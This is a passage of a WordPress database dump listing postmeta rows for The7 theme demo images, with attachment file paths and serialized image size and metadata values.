(3154,1225,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:30:\"2016/11/d-digital-agency-1.jpg\";s:8:\"filesize\";i:78663;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"d-digital-agency-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12165;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"d-digital-agency-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6275;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3155,1225,'_the7_imported_item','old-landing'),
(3156,1234,'_wp_attached_file','2017/03/l-001-hd.png'),
(3157,1234,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:154;s:6:\"height\";i:154;s:4:\"file\";s:20:\"2017/03/l-001-hd.png\";s:8:\"filesize\";i:6980;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"l-001-hd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9788;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3158,1234,'_the7_imported_item','old-landing'),
(3159,1235,'_wp_attached_file','2017/03/l-001.png'),
(3160,1235,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:77;s:6:\"height\";i:77;s:4:\"file\";s:17:\"2017/03/l-001.png\";s:8:\"filesize\";i:5679;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3161,1235,'_the7_imported_item','old-landing'),
(3162,1243,'_wp_attached_file','2016/11/d-book-store.jpg'),
(3163,1243,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2016/11/d-book-store.jpg\";s:8:\"filesize\";i:165185;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"d-book-store-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15428;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"d-book-store-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7653;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3164,1243,'_the7_imported_item','old-landing'),
(3165,1267,'_wp_attached_file','2016/11/d-travel.jpg'),
(3166,1267,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2016/11/d-travel.jpg\";s:8:\"filesize\";i:230161;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"d-travel-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19195;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"d-travel-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8083;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3167,1267,'_the7_imported_item','old-landing'),
(3168,1285,'_wp_attached_file','2016/11/d-pers-cr.jpg'),
(3169,1285,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:21:\"2016/11/d-pers-cr.jpg\";s:8:\"filesize\";i:90548;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"d-pers-cr-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9774;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"d-pers-cr-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5679;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3170,1285,'_the7_imported_item','old-landing'),
(3171,1295,'_wp_attached_file','2016/11/d-app-blue.jpg'),
(3172,1295,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2016/11/d-app-blue.jpg\";s:8:\"filesize\";i:134030;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"d-app-blue-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13347;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"d-app-blue-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7101;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3173,1295,'_the7_imported_item','old-landing'),
(3174,1312,'_wp_attached_file','2016/11/d-corp.jpg'),
(3175,1312,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2016/11/d-corp.jpg\";s:8:\"filesize\";i:127237;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"d-corp-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13419;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"d-corp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6257;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3176,1312,'_the7_imported_item','old-landing'),
(3177,1338,'_wp_attached_file','2016/11/webdesign-showcase.jpg'),
(3178,1338,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:30:\"2016/11/webdesign-showcase.jpg\";s:8:\"filesize\";i:80457;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"webdesign-showcase-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11066;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"webdesign-showcase-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5656;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3179,1338,'_the7_imported_item','old-landing'),
(3180,1340,'_wp_attached_file','2016/11/showcase-yoga.jpg'),
(3181,1340,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2016/11/showcase-yoga.jpg\";s:8:\"filesize\";i:92341;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"showcase-yoga-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13890;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"showcase-yoga-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6998;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3182,1340,'_the7_imported_item','old-landing'),
(3183,1342,'_wp_attached_file','2016/11/showcase-oana-photo.jpg'),
(3184,1342,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:31:\"2016/11/showcase-oana-photo.jpg\";s:8:\"filesize\";i:109808;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"showcase-oana-photo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13797;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"showcase-oana-photo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7057;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3185,1342,'_the7_imported_item','old-landing'),
(3186,1355,'_wp_attached_file','2016/11/d-small-store.jpg'),
(3187,1355,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2016/11/d-small-store.jpg\";s:8:\"filesize\";i:121601;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"d-small-store-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16182;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"d-small-store-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7449;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3188,1355,'_the7_imported_item','old-landing'),
(3189,1395,'_wp_attached_file','2017/11/d-agency.jpg'),
(3190,1395,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2017/11/d-agency.jpg\";s:8:\"filesize\";i:98721;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"d-agency-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14158;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"d-agency-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6537;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3191,1395,'_the7_imported_item','old-landing'),
(3192,1405,'_wp_attached_file','2018/01/d-dental.jpg'),
(3193,1405,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2018/01/d-dental.jpg\";s:8:\"filesize\";i:99679;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"d-dental-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11163;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"d-dental-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5406;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3194,1405,'_the7_imported_item','old-landing'),
(3195,1410,'_wp_attached_file','2018/01/d-law-firm.jpg'),
(3196,1410,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2018/01/d-law-firm.jpg\";s:8:\"filesize\";i:99848;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"d-law-firm-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12984;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"d-law-firm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6778;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3197,1410,'_the7_imported_item','old-landing'),
(3198,1414,'_wp_attached_file','2018/02/showcase-shop.jpg'),
(3199,1414,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2018/02/showcase-shop.jpg\";s:8:\"filesize\";i:78197;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"showcase-shop-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16770;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"showcase-shop-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8043;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3200,1414,'_the7_imported_item','old-landing'),
(3201,1422,'_wp_attached_file','2018/02/demo-d-a.jpg'),
(3202,1422,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2018/02/demo-d-a.jpg\";s:8:\"filesize\";i:49784;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"demo-d-a-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10444;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"demo-d-a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5451;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3203,1422,'_the7_imported_item','old-landing'),
(3204,1480,'_wp_attached_file','2018/06/demo-event.jpg'),
(3205,1480,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2018/06/demo-event.jpg\";s:8:\"filesize\";i:143360;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"demo-event-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16876;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"demo-event-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7660;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3206,1480,'_the7_imported_item','old-landing'),
(3207,1481,'_wp_attached_file','2018/06/demo-soft.jpg'),
(3208,1481,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:21:\"2018/06/demo-soft.jpg\";s:8:\"filesize\";i:107479;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"demo-soft-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13601;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"demo-soft-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7258;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3209,1481,'_the7_imported_item','old-landing'),
(3210,1512,'_wp_attached_file','2018/10/art-1-left.png'),
(3211,1512,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:844;s:6:\"height\";i:958;s:4:\"file\";s:22:\"2018/10/art-1-left.png\";s:8:\"filesize\";i:524293;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"art-1-left-264x300.png\";s:5:\"width\";i:264;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:90037;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"art-1-left-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32510;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"art-1-left-768x872.png\";s:5:\"width\";i:768;s:6:\"height\";i:872;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:603609;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3212,1512,'_the7_imported_item','old-landing'),
(3213,1513,'_wp_attached_file','2018/10/art-1-right.png'),
(3214,1513,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1114;s:6:\"height\";i:921;s:4:\"file\";s:23:\"2018/10/art-1-right.png\";s:8:\"filesize\";i:453773;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"art-1-right-300x248.png\";s:5:\"width\";i:300;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65287;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"art-1-right-1024x847.png\";s:5:\"width\";i:1024;s:6:\"height\";i:847;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:549711;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"art-1-right-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25167;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"art-1-right-768x635.png\";s:5:\"width\";i:768;s:6:\"height\";i:635;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:337315;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3215,1513,'_the7_imported_item','old-landing'),
(3216,1516,'_wp_attached_file','2018/10/art-02-left.png'),
(3217,1516,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:677;s:6:\"height\";i:829;s:4:\"file\";s:23:\"2018/10/art-02-left.png\";s:8:\"filesize\";i:178570;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"art-02-left-245x300.png\";s:5:\"width\";i:245;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59451;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"art-02-left-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23727;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3218,1516,'_the7_imported_item','old-landing'),
(3219,1517,'_wp_attached_file','2018/10/art-02-right.png'),
(3220,1517,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:917;s:6:\"height\";i:798;s:4:\"file\";s:24:\"2018/10/art-02-right.png\";s:8:\"filesize\";i:259434;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"art-02-right-300x261.png\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62956;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"art-02-right-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23656;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"art-02-right-768x668.png\";s:5:\"width\";i:768;s:6:\"height\";i:668;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:324929;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s: